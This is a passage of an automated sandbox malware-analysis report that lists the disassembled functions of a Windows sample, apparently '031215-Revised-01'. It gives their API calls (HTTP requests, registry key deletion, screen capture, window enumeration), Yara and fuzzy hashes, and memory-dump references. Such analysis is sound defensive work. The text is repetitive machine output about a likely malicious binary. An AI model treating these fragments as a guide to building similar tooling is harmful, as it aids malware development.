                                        • Instruction Fuzzy Hash: AE616971508301AFD701EF64DC85DAFBBE8FF99350F004A2DF595921A2DB709A89CB92
                                        Function 000EC476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000EC4B0
                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 000EC4C3
                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 000EC4D7
                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 000EC4F0
                                        • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 000EC533
                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 000EC549
                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000EC554
                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 000EC584
                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 000EC5DC
                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 000EC5F0
                                        • InternetCloseHandle.WININET(00000000), ref: 000EC5FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                        • String ID:
                                        • API String ID: 3800310941-3916222277
                                        • Opcode ID: acb84e1d62fd654c2b8743052b01c1f13d7333d05768082df41076b06aac9bf7
                                        • Instruction ID: ba603617c39ff26e2e9875cfd1df745c258d6284825855d0d05b22af96c5ee60
                                        • Opcode Fuzzy Hash: acb84e1d62fd654c2b8743052b01c1f13d7333d05768082df41076b06aac9bf7
                                        • Instruction Fuzzy Hash: CC517FB1500744BFEB219F65C948EAB7BFCFF04344F00451AF986A6650D771E9859FA0
                                        Function 0010856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00108592
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 001085A2
                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 001085AD
                                        • CloseHandle.KERNEL32(00000000), ref: 001085BA
                                        • GlobalLock.KERNEL32(00000000), ref: 001085C8
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 001085D7
                                        • GlobalUnlock.KERNEL32(00000000), ref: 001085E0
                                        • CloseHandle.KERNEL32(00000000), ref: 001085E7
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 001085F8
                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,0010FC38,?), ref: 00108611
                                        • GlobalFree.KERNEL32(00000000), ref: 00108621
                                        • GetObjectW.GDI32(?,00000018,000000FF), ref: 00108641
                                        • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00108671
                                        • DeleteObject.GDI32(00000000), ref: 00108699
                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 001086AF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                        • String ID:
                                        • API String ID: 3840717409-0
                                        • Opcode ID: eaa2ff5a8ab05004ac69e5c9ef89a6306b8b88fc2878adbb13dcd4914b28fa21
                                        • Instruction ID: 75eeec3f55ae4520cb92a99c28b5097ef8bfbbb2589939d4a17363f3e0cd99f4
                                        • Opcode Fuzzy Hash: eaa2ff5a8ab05004ac69e5c9ef89a6306b8b88fc2878adbb13dcd4914b28fa21
                                        • Instruction Fuzzy Hash: 09412C75600208EFDB119F65CC48EAA7BB8FF89711F108258F985D7690DBB19941CF60
                                        Function 000E14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VariantInit.OLEAUT32(00000000), ref: 000E1502
                                        • VariantCopy.OLEAUT32(?,?), ref: 000E150B
                                        • VariantClear.OLEAUT32(?), ref: 000E1517
                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 000E15FB
                                        • VarR8FromDec.OLEAUT32(?,?), ref: 000E1657
                                        • VariantInit.OLEAUT32(?), ref: 000E1708
                                        • SysFreeString.OLEAUT32(?), ref: 000E178C
                                        • VariantClear.OLEAUT32(?), ref: 000E17D8
                                        • VariantClear.OLEAUT32(?), ref: 000E17E7
                                        • VariantInit.OLEAUT32(00000000), ref: 000E1823
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                        • API String ID: 1234038744-3931177956
                                        • Opcode ID: 21946620e932b99792419713b4085b6fe2884527261de9a983de00c091c786d7
                                        • Instruction ID: 7b78a089c1987fc421eb71766ca22a38295be4054c2c8ae89bfe5236b083eaa5
                                        • Opcode Fuzzy Hash: 21946620e932b99792419713b4085b6fe2884527261de9a983de00c091c786d7
                                        • Instruction Fuzzy Hash: FCD10032A00A01EFDB20AF66D885BFDB7B1BF45700F10815AE896BB585DB74DC40DBA1
                                        Function 000FB60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                          • Part of subcall function 000FC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000FB6AE,?,?), ref: 000FC9B5
                                          • Part of subcall function 000FC998: _wcslen.LIBCMT ref: 000FC9F1
                                          • Part of subcall function 000FC998: _wcslen.LIBCMT ref: 000FCA68
                                          • Part of subcall function 000FC998: _wcslen.LIBCMT ref: 000FCA9E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000FB6F4
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000FB772
                                        • RegDeleteValueW.ADVAPI32(?,?), ref: 000FB80A
                                        • RegCloseKey.ADVAPI32(?), ref: 000FB87E
                                        • RegCloseKey.ADVAPI32(?), ref: 000FB89C
                                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 000FB8F2
                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 000FB904
                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 000FB922
                                        • FreeLibrary.KERNEL32(00000000), ref: 000FB983
                                        • RegCloseKey.ADVAPI32(00000000), ref: 000FB994
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                        • API String ID: 146587525-4033151799
                                        • Opcode ID: b3a4d94b9c461a6cd98d92a2985f5ba033e52f1d5112c3eff961de7f91f2f87f
                                        • Instruction ID: 6a55c4d3955c1dc7fe392adfd76dcd5a9eff12e01e8b6a570759d34f0aed62c6
                                        • Opcode Fuzzy Hash: b3a4d94b9c461a6cd98d92a2985f5ba033e52f1d5112c3eff961de7f91f2f87f
                                        • Instruction Fuzzy Hash: 78C19C34608205AFD720DF24C495F6ABBE1BF84308F14855CF69A8BAA2CB75EC45DF91
                                        Function 000F255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDC.USER32(00000000), ref: 000F25D8
                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 000F25E8
                                        • CreateCompatibleDC.GDI32(?), ref: 000F25F4
                                        • SelectObject.GDI32(00000000,?), ref: 000F2601
                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 000F266D
                                        • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 000F26AC
                                        • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 000F26D0
                                        • SelectObject.GDI32(?,?), ref: 000F26D8
                                        • DeleteObject.GDI32(?), ref: 000F26E1
                                        • DeleteDC.GDI32(?), ref: 000F26E8
                                        • ReleaseDC.USER32(00000000,?), ref: 000F26F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                        • String ID: (
                                        • API String ID: 2598888154-3887548279
                                        • Opcode ID: a53526c95f7789f48fec6a79a23ae83eaf7143e80eecc9b47404bd72c248e360
                                        • Instruction ID: 31ce0d923cef2e3ab2b88ba3cfed6bf7ea408966761c686f2e0c16d325890204
                                        • Opcode Fuzzy Hash: a53526c95f7789f48fec6a79a23ae83eaf7143e80eecc9b47404bd72c248e360
                                        • Instruction Fuzzy Hash: B06102B5D00219EFCF14CFA4D884AAEBBF6FF48310F208529EA55A7650D770A951DF90
                                        Function 000ADA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ___free_lconv_mon.LIBCMT ref: 000ADAA1
                                          • Part of subcall function 000AD63C: _free.LIBCMT ref: 000AD659
                                          • Part of subcall function 000AD63C: _free.LIBCMT ref: 000AD66B
                                          • Part of subcall function 000AD63C: _free.LIBCMT ref: 000AD67D
                                          • Part of subcall function 000AD63C: _free.LIBCMT ref: 000AD68F
                                          • Part of subcall function 000AD63C: _free.LIBCMT ref: 000AD6A1
                                          • Part of subcall function 000AD63C: _free.LIBCMT ref: 000AD6B3
                                          • Part of subcall function 000AD63C: _free.LIBCMT ref: 000AD6C5
                                          • Part of subcall function 000AD63C: _free.LIBCMT ref: 000AD6D7
                                          • Part of subcall function 000AD63C: _free.LIBCMT ref: 000AD6E9
                                          • Part of subcall function 000AD63C: _free.LIBCMT ref: 000AD6FB
                                          • Part of subcall function 000AD63C: _free.LIBCMT ref: 000AD70D
                                          • Part of subcall function 000AD63C: _free.LIBCMT ref: 000AD71F
                                          • Part of subcall function 000AD63C: _free.LIBCMT ref: 000AD731
                                        • _free.LIBCMT ref: 000ADA96
                                          • Part of subcall function 000A29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,000AD7D1,00000000,00000000,00000000,00000000,?,000AD7F8,00000000,00000007,00000000,?,000ADBF5,00000000), ref: 000A29DE
                                          • Part of subcall function 000A29C8: GetLastError.KERNEL32(00000000,?,000AD7D1,00000000,00000000,00000000,00000000,?,000AD7F8,00000000,00000007,00000000,?,000ADBF5,00000000,00000000), ref: 000A29F0
                                        • _free.LIBCMT ref: 000ADAB8
                                        • _free.LIBCMT ref: 000ADACD
                                        • _free.LIBCMT ref: 000ADAD8
                                        • _free.LIBCMT ref: 000ADAFA
                                        • _free.LIBCMT ref: 000ADB0D
                                        • _free.LIBCMT ref: 000ADB1B
                                        • _free.LIBCMT ref: 000ADB26
                                        • _free.LIBCMT ref: 000ADB5E
                                        • _free.LIBCMT ref: 000ADB65
                                        • _free.LIBCMT ref: 000ADB82
                                        • _free.LIBCMT ref: 000ADB9A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                        • String ID:
                                        • API String ID: 161543041-0
                                        • Opcode ID: a93b49ed7fdb22b6442123f1a4e816c2efb2c3416dd2d62dee6f1774c0eda38d
                                        • Instruction ID: a2972d7d8d52c0e81ca37d66821779db154bd7275fa500c31a2c5cc2f899a292
                                        • Opcode Fuzzy Hash: a93b49ed7fdb22b6442123f1a4e816c2efb2c3416dd2d62dee6f1774c0eda38d
                                        • Instruction Fuzzy Hash: 27318D31604305DFEBA1AAB8E845B9B77E9FF12710F11442AE44AD7992DF30EC40C721
                                        Function 000D365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClassNameW.USER32(?,?,00000100), ref: 000D369C
                                        • _wcslen.LIBCMT ref: 000D36A7
                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 000D3797
                                        • GetClassNameW.USER32(?,?,00000400), ref: 000D380C
                                        • GetDlgCtrlID.USER32(?), ref: 000D385D
                                        • GetWindowRect.USER32(?,?), ref: 000D3882
                                        • GetParent.USER32(?), ref: 000D38A0
                                        • ScreenToClient.USER32(00000000), ref: 000D38A7
                                        • GetClassNameW.USER32(?,?,00000100), ref: 000D3921
                                        • GetWindowTextW.USER32(?,?,00000400), ref: 000D395D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                        • String ID: %s%u
                                        • API String ID: 4010501982-679674701
                                        • Opcode ID: 13d54367c1040396006f3ccead2d0447fb90a9d8dfbf52a0d4abef09e70f0768
                                        • Instruction ID: 5fffdb5cd6c5d9ea8c66a00763f844393862ff62e2b5c706e2023ec3a384102d
                                        • Opcode Fuzzy Hash: 13d54367c1040396006f3ccead2d0447fb90a9d8dfbf52a0d4abef09e70f0768
                                        • Instruction Fuzzy Hash: 5691A571204706AFD715DF24C895BEAF7E8FF44350F00862AF999D2291DB70EA45CBA2
                                        Function 000D4954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClassNameW.USER32(?,?,00000400), ref: 000D4994
                                        • GetWindowTextW.USER32(?,?,00000400), ref: 000D49DA
                                        • _wcslen.LIBCMT ref: 000D49EB
                                        • CharUpperBuffW.USER32(?,00000000), ref: 000D49F7
                                        • _wcsstr.LIBVCRUNTIME ref: 000D4A2C
                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 000D4A64
                                        • GetWindowTextW.USER32(?,?,00000400), ref: 000D4A9D
                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 000D4AE6
                                        • GetClassNameW.USER32(?,?,00000400), ref: 000D4B20
                                        • GetWindowRect.USER32(?,?), ref: 000D4B8B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                        • String ID: ThumbnailClass
                                        • API String ID: 1311036022-1241985126
                                        • Opcode ID: 91b3b4ab6096e702d6978c0bd0d8e515f5d39c37e2e8afa369b48e3ff06876c2
                                        • Instruction ID: e28f677b81c672e01876db0582422732431397ddeb7b0e5618076ee07c750607
                                        • Opcode Fuzzy Hash: 91b3b4ab6096e702d6978c0bd0d8e515f5d39c37e2e8afa369b48e3ff06876c2
                                        • Instruction Fuzzy Hash: 8991B8710083059BDB14CF14C985BAAB7E8FF94314F04856BFD899A296EB34ED45CBA2
                                        Function 000FCC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 000FCC64
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 000FCC8D
                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 000FCD48
                                          • Part of subcall function 000FCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 000FCCAA
                                          • Part of subcall function 000FCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 000FCCBD
                                          • Part of subcall function 000FCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 000FCCCF
                                          • Part of subcall function 000FCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 000FCD05
                                          • Part of subcall function 000FCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 000FCD28
                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 000FCCF3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                        • API String ID: 2734957052-4033151799
                                        • Opcode ID: 7c9a809956feac5f53188d8153415e8a90f64ab0d8c37bc938453f02f5146647
                                        • Instruction ID: 774156045852e7de9b22aae73855da2ac4336becdba056edbebcf5ab658f7856
                                        • Opcode Fuzzy Hash: 7c9a809956feac5f53188d8153415e8a90f64ab0d8c37bc938453f02f5146647
                                        • Instruction Fuzzy Hash: D1318F7590112CBBEB208B54DD89EFFBBBCEF45750F000165FA06E2644DB709A85EAE0
                                        Function 000E3D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 000E3D40
                                        • _wcslen.LIBCMT ref: 000E3D6D
                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 000E3D9D
                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 000E3DBE
                                        • RemoveDirectoryW.KERNEL32(?), ref: 000E3DCE
                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 000E3E55
                                        • CloseHandle.KERNEL32(00000000), ref: 000E3E60
                                        • CloseHandle.KERNEL32(00000000), ref: 000E3E6B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                        • String ID: :$\$\??\%s
                                        • API String ID: 1149970189-3457252023
                                        • Opcode ID: 861cee8fdbb657d67347a7945d7642703aeae1cd4f4e82aa5b126147e73b7dd8
                                        • Instruction ID: 7739c5b70534162998b1de70f292b9ec76c1d8b3a4b54cfda7fa72f0f721bf94
                                        • Opcode Fuzzy Hash: 861cee8fdbb657d67347a7945d7642703aeae1cd4f4e82aa5b126147e73b7dd8
                                        • Instruction Fuzzy Hash: F631B271904249ABDB219BA1DC49FEF3BBDEF88700F5041B5F545E6061EBB097848B64
                                        Function 000DE6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • timeGetTime.WINMM ref: 000DE6B4
                                          • Part of subcall function 0008E551: timeGetTime.WINMM(?,?,000DE6D4), ref: 0008E555
                                        • Sleep.KERNEL32(0000000A), ref: 000DE6E1
                                        • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 000DE705
                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 000DE727
                                        • SetActiveWindow.USER32 ref: 000DE746
                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 000DE754
                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 000DE773
                                        • Sleep.KERNEL32(000000FA), ref: 000DE77E
                                        • IsWindow.USER32 ref: 000DE78A
                                        • EndDialog.USER32(00000000), ref: 000DE79B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                        • String ID: BUTTON
                                        • API String ID: 1194449130-3405671355
                                        • Opcode ID: 5cdebe4e95a5d1ae6249dd4bb11c6a3be307862d4a50ee195cab28368aff2357
                                        • Instruction ID: 844685b01a46824c84644d407e8683736d640b5b9c6c28de0e2ee0ea27e713ea
                                        • Opcode Fuzzy Hash: 5cdebe4e95a5d1ae6249dd4bb11c6a3be307862d4a50ee195cab28368aff2357
                                        • Instruction Fuzzy Hash: 5C218474204344AFEB506F60EC89A3A3B69F755348F500526F94585BB1DBB1ACC08E75
                                        Function 000DE9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 000DEA5D
                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 000DEA73
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000DEA84
                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 000DEA96
                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 000DEAA7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: SendString$_wcslen
